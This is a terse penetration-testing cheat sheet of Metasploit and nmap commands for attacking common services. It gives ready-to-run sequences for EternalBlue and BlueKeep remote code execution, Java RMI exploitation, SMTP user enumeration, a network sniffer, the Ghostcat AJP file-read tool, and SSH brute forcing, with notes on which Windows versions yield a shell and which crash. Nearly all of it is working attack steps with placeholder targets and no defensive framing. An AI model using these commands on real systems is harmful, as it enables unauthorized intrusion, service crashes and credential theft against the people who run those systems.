exploit package

#1 SNMP(udp-169)
msf > use auxiliary/scanner/snmp/snmp_enum
msf(snmp_Enum) > set RHOSTS IP/prefix
msf(snmp_Enum) > set THREADS 20
msf(snmp_Enum) > run

#2 Java RMI(1099)
msf > use auxiliary/scanner/misc/java_rmi_server
msf(java_rmi_server) > set rhosts IP
msf(java_rmi_server) > run

msf > use exploit/multi/misc/java_rmi_server
msf(java_rmi_server) > set rhosts IP
msf(java_rmi_server) > run

#3 SMTP(25)
msf > use auxiliary/scanner/smtp/smtp_enum
msf(smtp_enum) > set rhosts IP
msf(smtp_enum) > set THREADS 30
msf(smtp_enum) > run

> nc IP 25
VRFY Users

#4 SMB(139,445)
msf > use auxiliary/scanner/smb/smb_ms17_010
msf(eternalblue) > set rhosts IP
msf(eternalblue) > run

msf > use exploit/windows/smb/ms17_010_eternalblue
msf(eternalblue) > set rhosts IP
msf(eternalblue) > run

* Caution
On some systems this module causes a BSOD (blue screen) or a reboot.
Shell obtainable - Windows Server 2008 R2 SP1
Causes BSOD - Windows XP, Windows Server 2003, Windows 7 SP1


#5 Bluekeep(3389)
msf > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf(bluekeep) > set RHOSTS IP
msf(bluekeep) > run

msf > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf(bluekeep) > set RHOSTS IP
msf(bluekeep) > set TARGET Id
msf(bluekeep) > run

Affected systems: Windows XP, 2003, Vista, 2008 and Windows 7. * Beware of BSOD.

#6 printnightmare(printspooler)
https://jdh5202.tistory.com/869

#7 sniffer
msf > use auxiliary/sniffer/psnuffle
msf(psnuffle) > set rhosts IP
msf(psnuffle) > run

#8 ajp(8009)
> git clone https://github.com/00theway/Ghostcat-CNVD-2020-10487
> python3 ajpShooter.py http://IP/index.jsp 8009 /WEB-INF/web.xml read
 
#9 robots_txt
msf > use auxiliary/scanner/http/robots_txt
msf(robots_txt) > set rhosts IP
msf(robots_txt) > set THREADS 20
msf(robots_txt) > run

# nmap
nmap -p 445 --script smb-vuln-ms17-010 127.0.0.1
nmap 127.0.0.1 -p 22 --script ssh-brute --script-args userdb=users.txt,passdb=passwords.txt
nmap -p 21 -sS --script ftp-anon 127.0.0.1
nmap -p 3306 --script mysql-info 127.0.0.1
nmap -p 3306 --script mysql-enum 127.0.0.1
nmap -sV -p21-8080 --script vulners 127.0.0.1
